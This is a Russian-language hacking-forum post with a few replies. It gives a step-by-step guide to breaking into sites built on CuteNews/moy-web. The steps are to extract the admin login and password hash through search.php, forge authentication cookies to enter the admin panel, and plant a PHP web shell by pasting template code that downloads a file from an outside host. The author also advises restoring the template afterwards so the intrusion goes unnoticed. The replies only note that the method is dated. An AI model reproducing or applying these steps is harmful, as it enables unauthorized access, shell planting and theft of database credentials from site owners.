Взлом сервера через CuteNews

[Silence]

1. Находим сайт на движке moy-web.
2. После того, как нашли сайт, ищем файл search.php по адресу .../news/search.php
3. Если файл там есть, значит приступаем к следующему действию, если файла нет, переходим к пункту 1.
4. Теперь нам надо узнать логин админа, для этого переходим сюда и вводим полный путь к search.php
5. Получили логин админа и теперь узнаем хэш админа, для этого переходим сюда и вводим Логин (у меня root) и путь к файлу search.php
6. Получаем хэш админа. (у меня ec361eff84f3ef4d75214585da176f5e)

Устанавливаем [Ссылки могут видеть только зарегистрированные пользователи. ] и [Ссылки могут видеть только зарегистрированные пользователи. ] для него.
Дальше идем Инструменты=>Редактор Cookies=>Добавить
Заполняем:
1. Имя=>username
2. Содержимое=>Логин администратора (у меня root)
3. Узел=> путь к сайту (БЕЗ HTTP:// напр. [Ссылки могут видеть только зарегистрированные пользователи. ])
4. Путь=>Путь к админке (у меня /news/)
Жмем сохранить.. Сохранили и добавляем еще 1 кук. Жмем добавить:
1. Имя=>md5_password
2. Содержимое=>Хэш (у меня ec361eff84f3ef4d75214585da176f5e)
3. Узел=> путь к сайту (БЕЗ [Ссылки могут видеть только зарегистрированные пользователи. ] напр. [Ссылки могут видеть только зарегистрированные пользователи. ])
4. Путь=>Путь к админке (у меня /news/)
Сохраняем… Теперь идем в админку… Воаля, вы залогинены)))

Не спешите добавить похабную новость, давайте зальем туда шелл, что бы узнать пароли от mysql и вообще управлять содержимым сайта.

Заливаем шелл:
Настройкa блока новостей=>Редактировать шаблоны=>Активные новости
Удаляем от туда всё и вставляем следующее:

Код:

HTML;
$file = file_get_contents('http://shellss.by.ru/file.txt');
$brd = fopen('file.php','w+');
$write = fwrite($brd, $file);

Сохранить…

Через пару минут наш файл загрузится.
Заходим .../news/file.php вводим логин-1 пароль-1
Потом не забудьте изменить шаблон активных новостей "как было", что бы не спалиться.

[Жорик]

А где ссылка на источник? этой статье уже несколько лет, каждый кто держит сервер знает что нужно удалять файл Search.php.
имхо Баян.

[wagan]

хотя может где-то и прокатит

[Jenyok]

Цитата: Сообщение от wagan хотя может где-то и прокатит

На не стабильных серверах которые работают несколько часов в день, админы которых новички в серверном деле. Более менее знающий админ удаляет файл search.php.
Да и сама обвязка Moy-Web уже теряет актуальность, многие переходят на Dle или Kasseler CMS.